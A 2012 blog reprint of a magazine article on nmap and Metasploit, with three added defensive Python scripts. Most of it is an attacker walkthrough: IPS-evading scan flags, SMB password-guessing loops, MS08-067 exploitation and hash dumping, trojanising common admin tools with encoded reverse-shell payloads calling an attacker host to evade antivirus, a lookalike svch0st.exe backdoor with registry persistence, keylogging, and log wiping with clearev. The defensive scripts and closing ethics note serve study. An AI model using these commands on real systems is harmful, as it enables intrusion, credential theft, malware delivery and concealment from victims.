Tuesday, February 21, 2012

Exploiting Software


In the hakin9.org February release I wrote about the latest version of nmap and about Metasploit, and how it could harm your network. The article gives you an idea of what Metasploit can offer. I would like to share the ins and outs of these tools and how they can benefit any security practitioner. Below is the content of the article.

The power of exploitation tools
Since 2011 we have heard about many incidents around the world: confidential information compromised, government websites defaced and big corporate networks crippled for one reason or another. The famous example is the Anonymous group, but have you ever wondered what the success factor is? Is this the new era of the modern ninja?

So far we don't hear much in the news about corporate networks being attacked by ninjas; rather we hear the term blackhat. Blackhat practitioners follow practices similar to those of the ancient ninja, although the tools used today differ from the ancient ones. The most common techniques they use are scanning and exploitation. I will cover these two important areas and the types of attack, using nmap and Metasploit.
What does a malicious hacker do
Whether blackhat or whitehat, they know what is required to hack a system or to secure one. Below are the 4 core areas that make up the cycle:
  • Scanning
  • Gaining access
  • Maintaining access
  • Clearing tracks

NMAP Scanning
NMAP is by far the most popular port scanning tool. Why is it so popular? Because NMAP provides the following information to attackers:
  • Live hosts on the network. In some cases the security administrator will block ICMP to avoid detection; nmap can still detect those hosts when you add the -Pn parameter at the end of the command (nmap ip_address -Pn).
  • Target identification such as OS detection (nmap ip_address -O) and service detection (nmap ip_address -sV).
  • Scriptable interaction with the target (e.g. nmap -sT --script=smb-check-vulns -P0 ip_address). This scan will detect whether any machine on the network has not been patched against MS08-067.
From the information collected you will have more visibility into what the target machine is, and you can properly plan your attack.

The art of scanning is very important, and we always try to gain information about the targets without revealing our presence or intentions. One of the preferred options is the stealth TCP scan against the remote system. As you can see from figure 1, the result of the nmap scan gives you an idea of what is running on the remote server: the list of open ports, along with a description of what was detected on each.

Figure 1: Result of nmap scanning.
As in figure 1, this type of scan won't work on the host anymore, because an intrusion prevention system (IPS) is now implemented across systems for better protection. Although in figure 1 we used -sS (SYN scan) and -A (enable all detection), this is no longer recommended, as there is now another piece of software, the IPS, that we need to bypass. The -A flag is not advisable where an IPS exists, because the scan generates a lot of noise.
Most of the time, if we need to perform a stealth scan, a technique like the following needs to be in place:
  • nmap -v -Pn -sS -f --mtu 32 --data-length 50 --source-port 99 --randomize-hosts -T 1
  • -sS is a half-open or SYN scan. These scans do not complete all three steps of the TCP handshake and therefore have a chance of not being logged or picked up by an IPS. The default TCP SYN scan attempts to identify the 1000 most commonly used TCP ports.
  • -f fragments packets. The idea is to split the TCP header over several packets to make it harder for a firewall or IPS to recognise the pattern.
  • --mtu specifies the MTU size. It is almost the same as the -f option. In this example we use an MTU size of 32; the size must be a multiple of 8 (e.g. 8, 16, 24, 32, ...).
  • --data-length sets the extra length added to each packet. This matters because some firewall vendors rely on the predictable packet size. In this example we add 50 bytes to every packet.
  • --source-port specifies the source port, to bypass poor firewall configurations.
  • --randomize-hosts: a typical IDS or IPS signature might trigger if you scan multiple target hosts in order. Randomizing the order in which you scan helps avoid this. You might want to consider this option when you have a list of IPs to scan.
  • -T 2 is the timing setting. When done over the full port range (-p1-65535) on four IPs it takes 1000 seconds to complete. -T1, as used in the command above, is the slowest setting.
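A defender's counterpart to the stealth scan above, added here as an example and not part of the original article: it runs over constructed netfilter-style firewall log lines (field names follow iptables LOG output; hosts, ports and thresholds are made up) and flags a source that sends SYNs to many distinct ports over a long window, re-uses one fixed source port (the --source-port 99 pattern) or sends fragmented SYNs (the -f/--mtu pattern).

```python
"""Spot slow stealth SYN scans in firewall logs (defender-side, added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in iptables LOG layout: 10.1.1.50 probes six ports from
# one fixed source port (99), 15 s apart like -T1, with one fragmented SYN
# (MF flag); 10.1.1.7 is a normal client opening three sessions to port 443.
SAMPLE_LOG = """\
Feb 21 14:31:00 gw kernel: IN=eth0 OUT= SRC=10.1.1.50 DST=10.1.1.10 LEN=90 PROTO=TCP SPT=99 DPT=22 SYN
Feb 21 14:31:05 gw kernel: IN=eth0 OUT= SRC=10.1.1.7 DST=10.1.1.10 LEN=60 PROTO=TCP SPT=51022 DPT=443 SYN
Feb 21 14:31:15 gw kernel: IN=eth0 OUT= SRC=10.1.1.50 DST=10.1.1.10 LEN=90 PROTO=TCP SPT=99 DPT=80 SYN
Feb 21 14:31:30 gw kernel: IN=eth0 OUT= SRC=10.1.1.50 DST=10.1.1.10 LEN=90 PROTO=TCP SPT=99 DPT=135 SYN
Feb 21 14:31:40 gw kernel: IN=eth0 OUT= SRC=10.1.1.7 DST=10.1.1.10 LEN=60 PROTO=TCP SPT=51023 DPT=443 SYN
Feb 21 14:31:41 gw kernel: IN=eth0 OUT= SRC=10.1.1.10 DST=10.1.1.7 LEN=60 PROTO=TCP SPT=443 DPT=51023 ACK SYN
Feb 21 14:31:45 gw kernel: IN=eth0 OUT= SRC=10.1.1.50 DST=10.1.1.10 LEN=90 ID=4242 MF PROTO=TCP SPT=99 DPT=139 SYN
Feb 21 14:32:00 gw kernel: IN=eth0 OUT= SRC=10.1.1.50 DST=10.1.1.10 LEN=90 PROTO=TCP SPT=99 DPT=445 SYN
Feb 21 14:32:10 gw kernel: IN=eth0 OUT= SRC=10.1.1.7 DST=10.1.1.10 LEN=60 PROTO=TCP SPT=51024 DPT=443 SYN
Feb 21 14:32:12 gw kernel: IN=eth0 OUT= SRC=10.1.1.7 DST=10.1.1.10 LEN=78 PROTO=UDP SPT=40001 DPT=53
Feb 21 14:32:15 gw kernel: IN=eth0 OUT= SRC=10.1.1.50 DST=10.1.1.10 LEN=90 PROTO=TCP SPT=99 DPT=3389 SYN
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: (?P<rest>.*)$")
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Return a dict for one TCP LOG line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rest = m.group("rest")
    fields = dict(FIELD_RE.findall(rest))
    if fields.get("PROTO") != "TCP":
        return None
    tokens = rest.split()
    return {
        "ts": datetime.strptime(m.group("ts"), "%b %d %H:%M:%S"),
        "src": fields["SRC"], "dst": fields["DST"],
        "spt": int(fields["SPT"]), "dpt": int(fields["DPT"]),
        # A SYN without ACK is a connection attempt; SYN+ACK is a reply.
        "syn_only": "SYN" in tokens and "ACK" not in tokens,
        # MF or FRAG: means the SYN arrived fragmented (-f / --mtu); legitimate
        # TCP SYNs practically never are.
        "fragment": "MF" in tokens or any(t.startswith("FRAG:") for t in tokens),
    }


def analyze(log_text, window_seconds=600, port_threshold=5):
    """Per source: max distinct (dst, port) targets inside any window, plus
    fixed-source-port and fragment indicators, and a final 'scan' verdict."""
    per_src = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["syn_only"]:
            per_src[rec["src"]].append(rec)

    report = {}
    for src, recs in per_src.items():
        recs.sort(key=lambda r: r["ts"])
        best, start = 0, 0
        # Sliding window: a -T1 scan spaces probes 15 s apart, so the window
        # must be minutes long or a slow scan never crosses the threshold.
        for end in range(len(recs)):
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            best = max(best, len({(r["dst"], r["dpt"]) for r in recs[start:end + 1]}))
        fixed = len(recs) >= 3 and len({r["spt"] for r in recs}) == 1
        frags = sum(1 for r in recs if r["fragment"])
        report[src] = {"distinct_ports": best, "fixed_source_port": fixed,
                       "fragmented_syns": frags,
                       "scan": best >= port_threshold or frags > 0}
    return report


if __name__ == "__main__":
    for src, info in sorted(analyze(SAMPLE_LOG).items()):
        print(src, info)
```

Feed it real `kern.log` lines from a LOG rule on new inbound SYNs; tune window_seconds and port_threshold to the site's traffic before alerting on it.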

But as you can see, each time you perform information gathering nmap gives you a lot of information, and it won't be practical to keep all of it in a single file. This is where Metasploit comes into the picture to reduce the effort: all scanned information is kept in a database rather than a flat file.
NMAP integration with a database
Once we know what we are looking for, we need to document all our findings in a proper format so that we can easily find the vulnerable machines we plan to exploit. In my previous example we learned how to use the stealth technique when scanning a server. Now we need to output our scan in a usable format. In my past experience I used a lot of bash shell scripting to perform the same task with NMAP.
Before I go into the easier way, I would like to share the following script, which scans subnet 10, tries to find the live hosts and filters only the Windows servers. The method is messy as it contains a lot of code, but if you are good with shell you are in control of the game.
# ping sweep: print the address of every host in 10.1.1.0/24 that answers
for i in `seq 1 254`; do
  ping -c 1 10.1.1.$i | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 &
done
wait

# find hosts with NetBIOS (139/tcp) open and keep their addresses
nmap -p 139 x.y.z.* -oG 139.txt
cat 139.txt | grep open | cut -d" " -f2
cat 139.txt | grep open | cut -d" " -f2 > 139-ips.txt
# fingerprint the OS of those hosts only
nmap -O -iL 139-ips.txt -oG 139-os.txt
cat 139-os.txt | grep open | cut -d":" -f4

The other method is much easier: we use the same command to run the scan and export it to XML format. What we need to do is run the command above as nmap -sS -Pn -A -oX subnet10.xml, and a file named subnet10.xml will be created.
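Once the scan is in XML it can be read without Metasploit as well. The parser below is an added example, not code from the article or from nmap/Metasploit; the XML sample is a constructed fragment in nmap's -oX layout and the function names are my own. It lists each live host's open ports and OS guess, reproduces the "host port service" view the shell script above built with grep and cut, and picks out the Windows hosts with SMB exposed, which are the ones to put through smb-check-vulns patch verification first.

```python
"""Read nmap -oX output into an inventory for patch triage (added example)."""
import xml.etree.ElementTree as ET

# Constructed fragment in nmap's XML layout: one Windows XP host with SMB open
# and a filtered RDP port, one Linux host, one host that was down.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -Pn -A -oX subnet10.xml 10.1.1.0/24">
  <host><status state="up"/><address addr="10.1.1.10" addrtype="ipv4"/>
    <hostnames><hostname name="winxp-1" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/><service name="ms-wbt-server"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP2" accuracy="98"/></os>
  </host>
  <host><status state="up"/><address addr="10.1.1.20" addrtype="ipv4"/><hostnames/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="5.3p1"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.32" accuracy="95"/></os>
  </host>
  <host><status state="down"/><address addr="10.1.1.30" addrtype="ipv4"/></host>
</nmaprun>
"""

SMB_PORTS = {139, 445}


def parse_nmap_xml(text):
    """Return one dict per live host: address, hostname, OS guess, open ports."""
    hosts = []
    for h in ET.fromstring(text).findall("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no port or OS data
        addr = next((a.get("addr") for a in h.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        hn, osm = h.find("hostnames/hostname"), h.find("os/osmatch")
        open_ports = []
        for p in h.findall("ports/port"):
            st = p.find("state")
            if st is None or st.get("state") != "open":
                continue  # closed/filtered ports are noise for triage
            svc = p.find("service")
            product = ""
            if svc is not None:
                product = " ".join(filter(None, (svc.get("product"), svc.get("version"))))
            open_ports.append({"port": int(p.get("portid")), "proto": p.get("protocol"),
                               "service": svc.get("name") if svc is not None else "",
                               "product": product})
        hosts.append({"addr": addr,
                      "hostname": hn.get("name") if hn is not None else "",
                      "os": osm.get("name") if osm is not None else "",
                      "os_accuracy": int(osm.get("accuracy", 0)) if osm is not None else 0,
                      "open_ports": sorted(open_ports, key=lambda x: x["port"])})
    return hosts


def open_port_lines(hosts):
    """The 'host port service' listing the shell script built with grep/cut."""
    return [f"{h['addr']} {p['port']}/{p['proto']} {p['service']}"
            for h in hosts for p in h["open_ports"]]


def smb_exposed_windows_hosts(hosts, min_accuracy=90):
    """Addresses of live hosts fingerprinted as Windows (at or above the given
    OS-match accuracy) that expose SMB: the first candidates for patch checks."""
    out = []
    for h in hosts:
        is_windows = "windows" in h["os"].lower() and h["os_accuracy"] >= min_accuracy
        has_smb = any(p["proto"] == "tcp" and p["port"] in SMB_PORTS for p in h["open_ports"])
        if is_windows and has_smb:
            out.append(h["addr"])
    return out


if __name__ == "__main__":
    inventory = parse_nmap_xml(SAMPLE_XML)
    print("\n".join(open_port_lines(inventory)))
    print("SMB-exposed Windows hosts:", smb_exposed_windows_hosts(inventory))
```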

Storing scan results in Metasploit
Take note that MySQL is no longer supported in Metasploit; you need to use PostgreSQL as the main database. The database is not part of the package and you need to install it manually. The installation is not hard; you can follow the steps below.

  • Install the server and client with the command apt-get install postgresql-8.4 postgresql-client-8.4.
  • Start the service with /etc/init.d/postgresql-8.4 start.
  • Next, disable SSL in the config file: nano /etc/postgresql/8.4/main/postgresql.conf and find the following line:
    #ssl = true # (change requires restart)
  • Now that we are done with PostgreSQL, the next step is to start the service by typing /etc/init.d/postgresql-8.4 start.
  • To configure the password, open the terminal and, in a psql session, type ALTER USER postgres WITH PASSWORD 'mypassword'; then \q to quit, followed by sudo passwd -d postgres. I believe those of you who have been using MySQL will see that it is easier to use.

The next steps are creating the database in Metasploit and loading the nmap scan XML into it. First we load the Metasploit console. I will summarise it in 3 steps.
  • Load Metasploit by typing msfconsole. This is the command to start the engine.
  • db_connect postgres:mypassword@localhost/mypentest creates a new database called mypentest with all the required tables. The general format is db_connect username:password@localhost/databasename.
  • db_import subnet10.xml imports the scan you performed earlier into the database. Note that an nmap scan doesn't tell you what the vulnerabilities are, but it gives you an idea of the open ports and fingerprints the operating system.
  • However, for testing purposes in BackTrack 5, we can do a further check for SMB vulnerabilities with nmap -sT --script=smb-check-vulns -P0. I find this a pretty awesome command to start testing with. As you know, many organisations have challenges with patch management; with this we can go straight to the areas we would like to exploit.

Motive of the attacker
After running the scanning tools, the second step is finding the systems we can attack further. The most common vulnerabilities that insider espionage is likely to use are listed below. You will probably think the 4th point is a waste of time and that you will never find it in the network, but if you have thousands of servers to check, I believe at least 1% of them are not properly managed. However, I would like to cover more than just software exploitation. As administrators we have an important part in managing servers, but have you ever considered whether the tools we use are free from malware? In this article I will cover how software can be re-engineered without breaking it, which is important where antivirus scanning is concerned.
  • Unpatched Microsoft Windows Server
  • Weak admin password
  • SQL Server
  • VNC server, which provides graphical access to a remote system, similar to Microsoft's Remote Desktop
  • Sending malware to the users

What is Metasploit
The Metasploit Project is an open-source computer security project developed by HD Moore. The tools have improved over the years since October 2003: originally there were 11 exploits, and guess what the total is now? The framework now consists of 798 exploits and 246 payloads. Metasploit comes in free and commercial versions, which are updated on a regular basis. You can always update the software with the msfupdate command to get the latest exploits and test them out.
What can Metasploit really do?
Judging from the name, you know that the tool's purpose is to exploit a vulnerable system. Before I get started on what we will do with the software, you must know what Metasploit can do. One feature that may be good to remove is db_autopwn, which performs an automatic attack on the hosts; this might cause an unintentional attack. What I will cover next are the 5 attack vectors that are most commonly used.

Attack vector 1: Unpatched Microsoft Windows Server
Attacking a Windows machine seems quite common today, due to the lack of patch management as well as other factors such as running non-genuine Microsoft products. How would the attacker start? Most probably with a common vulnerability such as MS08-067. This is no joke, as some organisations never patch their systems. There are two approaches: the first is simply to guess that they have a vulnerable system, and the second is to use the scanner I explained earlier.

Metasploit is not so hard to use once we know the concepts. In each attack we need an exploit and a payload. An exploit is the code that takes advantage of a vulnerability, bearing in mind that unforeseen protective measures may be in place to prevent a particular exploit.

A payload is the code that we want the system to run so that it interacts with the attacker after successful exploitation. To start Metasploit we run the first command, msfconsole, which displays the screen we use most.

To find the exploit for MS08-067, issue the command "search ms08-067" and you will see where the exploit is located. There is some built-in flexibility.
Figure 2: Example configuration for exploiting the vulnerability on Windows XP

As you can see in figure 2, Metasploit has been configured to use the MS08-067 vulnerability on the target host. The payload we use is meterpreter, which provides a lot more flexibility in handling the remote system. In the payload options LPORT has been set to 8080, as port 8080 will most likely be allowed as a proxy port; it is even better to set it to a well-known port such as 80 or 443 to avoid detection. If you want to see the list of meterpreter options, type the help command to see all the available commands, grouped as follows:

  • Core command
  • File system
  • Networking
  • System
  • User interface
  • Webcam
  • Elevate
  • Password database
  • Timestomp
Figure 3: Dumping the user ID hashes

As you can see in figure 3, we have got the hashes. In some cases the admin user ID will be renamed to hide its role, but each user ID has its own SID to differentiate it from the others. The value 500 at the end of the SID identifies the user ID as the administrator.

In this example we will collect the information as below. We need to extract the hash from the output above, which is 11cb3f697332ae4cc295285c92cd06b4, and copy it over to http://www.onlinehashcrack.com/index.php. We do this to find the original password for the exploited machine.


Attack vector 2: Weak admin password
Checking for weak passwords has become a must-know skill in the security arena. Although there are many commercial scanners on the market that provide this functionality, I would like to show you 3 options: scripts on Windows Server and Linux, and Metasploit as our core tool.

Let's start with the Windows script. First, you need a credential file, password.txt, in the following format:

Password        Username
mypassword      administrator
password1       admin

Next, execute the following command at the command prompt and you will be able to check the passwords:
FOR /F "tokens=1,2*" %i in (password.txt) do net use \\remoteserver\ipc$ %i /u:%j

Do you see how easily we can build a tool within Windows? But what about Linux scripting? The approach is the same; only the syntax differs. The first thing you need is a dictionary file called credential. The content of the file will be as follows:


The next step is to open a shell on Linux and type the following command:

for I in `cat credential`; do smbclient -L remote_ip --user=administrator%$I; done

What the command does is read the credential file line by line into the variable I. For each line it uses smbclient to connect to the remote host with the username administrator; the %$I part supplies the password taken from the credential file.

As you have learned so far, there are 2 approaches: one for Windows and one for Linux scripting. The good news is that Metasploit has similar functionality. As you can see from figure 4, we have a lot of options for checking weak passwords on the network. If you want to scan an entire network, set it on RHOSTS by typing set RHOSTS followed by the range. This minimises your effort in developing new code.

Figure 4: Password auditing tools in Metasploit

Attack vector 3: SQL Server
Database servers are always critical servers in handling and processing business requirements. However, some organisations lack knowledge from the security point of view; instead of security, money is invested in high availability of the server to avoid hardware failure and so on. But high availability on a single database server is not guaranteed if standard security practices are not in place.

Metasploit has the option of validating whether there are any weak passwords in the network, and the most common module we use for this is scanner/mssql/mssql_login. Finding the right password is a very important phase before we can go to figure 5. Once we have the password, we set the configuration as in figure 5 and run the command exploit. If it works, we have control of the remote server's operating system.

Figure 5: Setting up the exploit on MS SQL

Attack vector 4: VNC server
This is my favourite attack of all, because we are trying our luck to see whether there is any VNC server in the network running without a password. As you know, VNC is a console mode, which means that if you use a session and don't lock it, the same unlocked screen can be seen from other hosts. Metasploit has an option to find these systems with no password, which can help you manage the risk of being exploited. The first thing to do is search for vnc in the Metasploit console; if any are found you will see a list of VNC modules. In this article I will choose the VNC bypass option; as you can see below, AUTOVNC has been set to true (by default it is false). If we successfully attack a remote server, the VNC screen appears on the attacker's screen. However, there is some risk in using this method: once you are connected, the VNC icon on the remote server turns black, which means that if someone is watching, they will see someone connecting to the machine.

Figure 6: Bypassing VNC

Attack vector 5: Sending malware to the users
Of all the attacks, attack vector 5 is the scariest, and I will explain why. In your organisation you are the system administrator and you use a lot of tools to manage the systems. Those tools come from Microsoft, Sysinternals or other free software providers. Have you ever considered how valid those files are? Let's take an example: I believe everyone has a file server at their organisation, and where better to store all the required files for safekeeping than the file server?

But how do you guarantee that the files you use daily for system administration have not been compromised by malware? When your antivirus scans the files it detects nothing, and you believe the files are free from malware. What if I told you that is wrong? There is now the ability to hide malware from any antivirus software. The point of this attack is that each time the user launches the software it automatically connects back to the attacker, from where the attacker can launch different types of attack depending on their motive.

Again we use the same payload, windows/meterpreter/reverse_tcp, setting LPORT to 8080 to avoid detection. What we need to do is encode our binary with shikata_ga_nai. The first step is to download any software commonly used by the users, such as PuTTY or Excel Viewer, and copy the file to /opt/frameworks/msf3/work.

From here we encode the binary by issuing the following command: msfpayload windows/meterpreter/reverse_tcp LHOST=attacker_ip_address LPORT=8080 R | msfencode -t exe -x /opt/framework/msf3/work/myfiles.exe -o /root/Desktop/back.exe -e x86/shikata_ga_nai -c 5

This time we use 5 rounds of encoding, shown as -c 5; the more rounds you do, the better the chance of sneaking past the antivirus. When this stage is finished, we have completed the task of creating the binary.

On the attacker's side, they would run the command: msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=8080.

Next we need someone to click on the file, and from there we can launch the attack. The scary part is: what if your IT support team were using these infected files, with no way of telling whether the files are infected with malware or not?

Maintaining access by planting a backdoor
Once we have exploited the machine and have access to the server, this may be only temporary access. We might want to revisit the system to get more information from it:

Install as a service
Windows might be rebooted for some reason, such as maintenance or a crash, so you will probably want to create the backdoor as a service so that next time you don't need to perform the same exploit all over again; you just wait for the client to power up the machine again. The persistence script can only be used once you have exploited the machine, and this is where you start installing it as a service. I always prefer port 443 or 80 as these are common ports.

meterpreter > run persistence -S  -i 7 -p 443 -r
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINXP-1_20120211.1431/WINXP-1_20120211.1431.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST= LPORT=443
[*] Persistent agent script is 609615 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\herNEE.vbs
[*] Executing script C:\WINDOWS\TEMP\herNEE.vbs
[+] Agent executed with PID 2952
[*] Installing as service..
[*] Creating service hDFbkpZQqoTkBx

Once the system is rebooted, you can connect back to the host using the multi/handler option. This only works for Windows machines with weak antivirus management, but for the sake of proof of concept you can try it out to learn how the entire framework works.

Capturing keystrokes
When some attackers have exploited a machine, their intention is not to disrupt the availability of the system; they are interested in stealing information, and one way to do that is by dumping all keystrokes. Before that they must know which process corresponds to which service. In most attacks the attacker goes after 2 main processes: winlogon.exe and explorer.exe.

The reason for attacking explorer.exe is simple: they want to know what the user is typing on the screen. For example, if the user is doing a bank transaction in a web browser, those keystrokes will be captured. winlogon.exe, on the other hand, is targeted to capture the user's password, although there is another method, which is to get the LM hash and decrypt it online. In this type of attack you just need to know 5 commands:

  • ps lists all the running processes on the Windows machine. If you want to attack winlogon.exe or explorer.exe, you must look up its PID number here.
  • migrate: once you have the PID number, type this to migrate into the explorer process (e.g. migrate 776).
  • getpid: if you switch between PIDs, you sometimes need to check which PID you are in. We don't use it much.
  • keyscan_start: the most interesting part, where we start the keylogger.
  • keyscan_dump: once the keylogger is started, type this command to see whether any new keystrokes have been recorded.

Creating an automatic backdoor
Creating a backdoor is always a challenge, as antivirus is updated with the latest prevention to make sure such files are not installed on the machines. My favourite is to create an exe with a name almost identical to one in the operating system. For example, for svchost.exe you can name the new backdoor svch0st.exe. If you look carefully, both names are almost the same; only the "o" is replaced with "0".

The first step is to create the file with the following command, which ensures that antivirus can't detect that it is a backdoor. For LPORT I use port 443, simply to hide it behind what looks like the user browsing the internet.

msfpayload windows/meterpreter/reverse_tcp LHOST=attacker_ip_address LPORT=443 R | msfencode -t exe -x /opt/framework/msf3/work/svchost.exe -o /root/Desktop/svch0st.exe -e x86/shikata_ga_nai -c 5

The next step is uploading the backdoor to system32. You can use the following command to upload it:
upload /root/Desktop/svch0st.exe c:\\windows\\system32\\

Before you make any further modification to the registry, look at the startup process names in the registry and plan for a better name. The syntax is as follows:

reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

Once you have determined the name, use the following command to create a startup entry. Each time the machine reboots, the entry starts automatically and the victim connects back to you via port 443. In the example below I use the name WindowsValidationService rather than backdoor.

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v WindowsValidationService -d c:\\windows\\system32\\svch0st.exe

Once all this is set up, the next thing to do is set up the multi/handler and wait for them to connect back to you, as I explained in attack vector 5.
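The Run-key entry above is exactly the kind of thing an administrator should be auditing for. The script below is an added example, not from the article; the entries and names are constructed in the layout of reg query output. It parses the exported Run key, normalises homoglyphs such as 0 for o, and flags values whose image name is a lookalike of a core Windows binary (or is such a binary, which is never started from a Run key) or whose image lives in a user-writable directory.

```python
"""Audit Run-key entries for lookalike binaries (defender-side, added example)."""
import re

# Constructed sample in the layout of `reg query HKLM\...\Run` output.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SoundMAX    REG_SZ    C:\Program Files\Analog Devices\SoundMAX\SMTray.exe
    WindowsValidationService    REG_SZ    c:\windows\system32\svch0st.exe
    Updater    REG_SZ    "C:\Documents and Settings\alice\Local Settings\Temp\update.exe" /silent
"""

ENTRY_RE = re.compile(r"^ {4}(?P<name>.+?) {2,}(?P<type>REG_\w+) {2,}(?P<data>.*)$")
EXE_RE = re.compile(r'^"?(?P<path>[^"]*?\.exe)', re.IGNORECASE)

# Core Windows processes started by the system itself, never from a Run key.
KNOWN_SYSTEM_EXES = {"svchost.exe", "lsass.exe", "csrss.exe", "smss.exe",
                     "winlogon.exe", "services.exe", "explorer.exe", "spoolsv.exe"}
# Digits commonly swapped for letters in lookalike names (0/o, 1/l, 3/e, 5/s).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})
USER_WRITABLE_HINTS = ("\\temp\\", "\\documents and settings\\", "\\users\\", "\\appdata\\")


def within_one_edit(a, b):
    """True if a and b differ by at most one insert, delete or substitution."""
    if abs(len(a) - len(b)) > 1:
        return False
    i = j = edits = 0
    while i < len(a) and j < len(b):
        if a[i] == b[j]:
            i += 1
            j += 1
            continue
        edits += 1
        if edits > 1:
            return False
        if len(a) > len(b):
            i += 1
        elif len(b) > len(a):
            j += 1
        else:
            i += 1
            j += 1
    return edits + (len(a) - i) + (len(b) - j) <= 1


def audit_run_entries(reg_query_text):
    """Return a finding per suspicious Run value: its name, image path and reasons."""
    findings = []
    for line in reg_query_text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue  # key header, blank lines
        name, data = m.group("name"), m.group("data").strip()
        exe = EXE_RE.match(data)
        image = exe.group("path") if exe else data
        base = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        reasons = []
        if base in KNOWN_SYSTEM_EXES:
            reasons.append(f"core system binary name {base} should not be started from a Run key")
        else:
            normalized = base.translate(HOMOGLYPHS)
            for known in sorted(KNOWN_SYSTEM_EXES):
                if normalized == known or within_one_edit(base, known):
                    reasons.append(f"lookalike of {known}")
                    break
        if any(h in image.lower() for h in USER_WRITABLE_HINTS):
            reasons.append("image lives in a user-writable location")
        if reasons:
            findings.append({"value": name, "image": image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_run_entries(SAMPLE_REG_QUERY):
        print(f"{f['value']}: {f['image']}")
        for r in f["reasons"]:
            print("   -", r)
```

A full audit should also hash each image and compare it against a known-good copy, since a lookalike name is only the cheapest tell; the same check applies to the HKCU Run key and the RunOnce keys.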

As you can see, you have the ability to manipulate the registry settings. If you want to attack Yahoo Messenger, you can even download the entire registry settings from HKEY_CURRENT_USER\Software\Yahoo\Pager and install them on your PC. This is also one way of stealing an identity.

Clear your tracks
This is the last phase of the attack; of course you won't want people to catch you for all the damage you have done. The most important part is deleting the logs. This last step is the simplest: you just type a single command, clearev, which deletes everything from the logs.

Note on ethics
Our intention when we started writing these articles was to give an overview of what tools exist on the market and how we can use them to secure our organisation against any unidentified threats. When you start to use the tools above, please make sure you keep this with you:
Don't use this for any malicious intention.
Don't attack any organisation without approval from the top management.
Think of the damage that you might cause.

In this article we have presented the abilities of NMAP and Metasploit on BackTrack 5. We have shown the trick of hiding in the network while performing intelligent information gathering. The author also shows common attacks as attackers carry them out, and how fast they can compromise a system. As you can see, the growth of these tools can help anyone become a security pentester, while in the wrong hands they could bring more damage than good. Such an attack is much easier to perform and more likely to succeed. The author sincerely hopes that these short articles can increase awareness among anyone handling computer or security services. In the broader sense, we hope the information helps you improve the security of your organisation's assets.

Stay tuned for my next articles. Let us know what you thought, what you learned and what you hope for in the next articles!
